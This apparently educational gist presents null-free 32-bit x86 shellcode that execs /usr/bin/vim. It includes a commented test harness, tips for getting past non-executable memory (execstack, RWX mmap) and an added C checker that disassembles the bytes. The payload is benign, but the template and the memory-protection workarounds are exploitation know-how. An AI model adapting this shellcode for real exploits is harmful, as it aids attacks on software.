@0
Created July 20, 2014 05:12
x86 shellcode

Back in 2010, I needed some shellcode, so I wrote this. It spawns Vim rather than a shell, so I guess it's technically "vimcode".

It is, of course, null-free. There is a commented version in the test file, but here it is in its entirety:

\x31\xc0\x31\xc9\x99\x50\x68\x2f\x76\x69\x6d\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xb0\x0b\xcd\x80

Usage

This is 32-bit shellcode, so if you want to run the test file on x86_64, you'll need multilib GCC. Note also that a current toolchain places a `const` array in a non-executable section, so calling into it will segfault unless the bytes are made executable: for the 32-bit build, add `-z execstack` (the kernel still treats an executable-stack flag on an i386 binary as read-implies-exec), or copy the bytes into an RWX `mmap` region before jumping to them.

gcc -m32 -z execstack -o test test.c

test.c:

const char shellcode[] =
    "\x31\xc0"              // xor  %eax, %eax    a = 0
    "\x31\xc9"              // xor  %ecx, %ecx    c = 0 (argv)
    "\x99"                  // cdq                d = 0 (envp; sign-extends eax=0 into edx)
    "\x50"                  // push %eax          NUL terminator for the string below
    "\x68\x2f\x76\x69\x6d"  // push $0x6d69762f   "/vim"  (pushed in reverse order, so the
    "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f   "/bin"   string reads "/usr/bin/vim"
    "\x68\x2f\x75\x73\x72"  // push $0x7273752f   "/usr"   from the lowest address up)
    "\x89\xe3"              // mov  %esp, %ebx    b = &"/usr/bin/vim"
    "\xb0\x0b"              // mov  $0x0b, %al    a = 11 (execve); only %al, so no NUL bytes
    "\xcd\x80";             // int  $0x80         execve(b, c, d)

int main(void) {
    // Jump straight into the bytes; on success execve() replaces this process with vim.
    ((void (*)(void)) shellcode)();
    return 0;
}
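The two properties the gist relies on, that the bytes contain no 0x00 and that the three `push imm32` instructions assemble "/usr/bin/vim" on the stack, can be checked mechanically rather than by eye. The following is an added example, not code from the gist: it does a linear sweep over the small opcode subset the shellcode uses, recovers the path and syscall number from it, flags the first NUL byte if there is one, and (only on request, only in a 32-bit build) runs the bytes from an anonymous RWX mapping instead of relying on `-z execstack`. The names `vimcode`, `first_nul`, `insn_len`, `recover_execve_path` and `run_in_rwx` are this example's own.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* The gist's 27 shellcode bytes: execve("/usr/bin/vim", NULL, NULL). */
static const unsigned char vimcode[] =
    "\x31\xc0\x31\xc9\x99\x50"
    "\x68\x2f\x76\x69\x6d"
    "\x68\x2f\x62\x69\x6e"
    "\x68\x2f\x75\x73\x72"
    "\x89\xe3\xb0\x0b\xcd\x80";
/* sizeof counts the C literal's own trailing NUL, which is not part of the code. */
#define VIMCODE_LEN (sizeof(vimcode) - 1)

/* Index of the first 0x00 byte in buf[0..len), or -1 if the code is null-free. */
int first_nul(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return (int)i;
    return -1;
}

/* Byte length of the 32-bit instruction at p, for the opcode subset this
 * shellcode uses. Returns 0 for anything else (or a truncated instruction)
 * so the sweep stops instead of guessing. */
size_t insn_len(const unsigned char *p, size_t avail) {
    if (avail == 0) return 0;
    unsigned char op = p[0];
    if (op == 0x99) return 1;                        /* cdq */
    if (op >= 0x50 && op <= 0x57) return 1;          /* push r32 */
    if (avail < 2) return 0;
    if (op == 0x31 || op == 0x89)                    /* xor/mov r/m32, r32 */
        return (p[1] & 0xc0) == 0xc0 ? 2 : 0;        /* register-direct ModRM only */
    if (op >= 0xb0 && op <= 0xb7) return 2;          /* mov r8, imm8 */
    if (op == 0xcd) return 2;                        /* int imm8 */
    if (op == 0x68) return avail >= 5 ? 5 : 0;       /* push imm32 */
    return 0;
}

/* Linear sweep over the shellcode. Each `push imm32` lowers esp by 4, so the
 * dword pushed last sits at the lowest address: concatenating the immediates in
 * reverse push order gives the string execve() sees through ebx. The syscall
 * number is the imm8 of `mov $imm8, %al`. Returns the recovered path length,
 * or -1 on an opcode outside the supported subset. */
int recover_execve_path(const unsigned char *buf, size_t len,
                        char *path, size_t pathsz, int *sysno) {
    const unsigned char *imm[16];
    size_t nimm = 0, i = 0;
    int sc = -1;
    while (i < len) {
        size_t n = insn_len(buf + i, len - i);
        if (n == 0) return -1;
        if (buf[i] == 0x68) {
            if (nimm == 16) return -1;
            imm[nimm++] = buf + i + 1;   /* little-endian imm32 == bytes in memory order */
        } else if (buf[i] >= 0xb0 && buf[i] <= 0xb7) {
            sc = buf[i + 1];
        }
        i += n;
    }
    if (nimm * 4 + 1 > pathsz) return -1;
    size_t off = 0;
    for (size_t k = nimm; k-- > 0; off += 4)
        memcpy(path + off, imm[k], 4);
    path[off] = '\0';                    /* mirrors the `push %eax` terminator */
    if (sysno) *sysno = sc;
    return (int)strlen(path);
}

/* Copy the bytes into a fresh RWX mapping and jump to them, which works even
 * when the compiler put the array in non-executable .rodata. Only meaningful
 * in a 32-bit process: in 64-bit mode `push imm32` pushes 8 bytes and the
 * path string falls apart. Returns only if execve() failed. */
int run_in_rwx(const unsigned char *buf, size_t len) {
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return -1;
    memcpy(mem, buf, len);
    ((void (*)(void))mem)();
    return -1;
}

int main(int argc, char **argv) {
    char path[64];
    int sysno = -1;
    printf("%zu bytes, first NUL at index %d\n",
           VIMCODE_LEN, first_nul(vimcode, VIMCODE_LEN));
    int plen = recover_execve_path(vimcode, VIMCODE_LEN, path, sizeof path, &sysno);
    printf("execve(\"%s\") [%d bytes], syscall %d\n", path, plen, sysno);
    /* gcc -m32 -o vimcode vimcode.c && ./vimcode --run   (spawns vim) */
    if (argc > 1 && strcmp(argv[1], "--run") == 0 && sizeof(void *) == 4)
        return run_in_rwx(vimcode, VIMCODE_LEN);
    return 0;
}
```

Without `--run` the program only analyses the bytes, so it is safe to build and run in a 64-bit environment; the sweep stops with -1 on the first opcode it does not know, which is the behaviour you want from a checker rather than a guess. The `first_nul` check is what would catch the classic mistake of writing `mov $0xb, %eax` (`b8 0b 00 00 00`) instead of `mov $0xb, %al`.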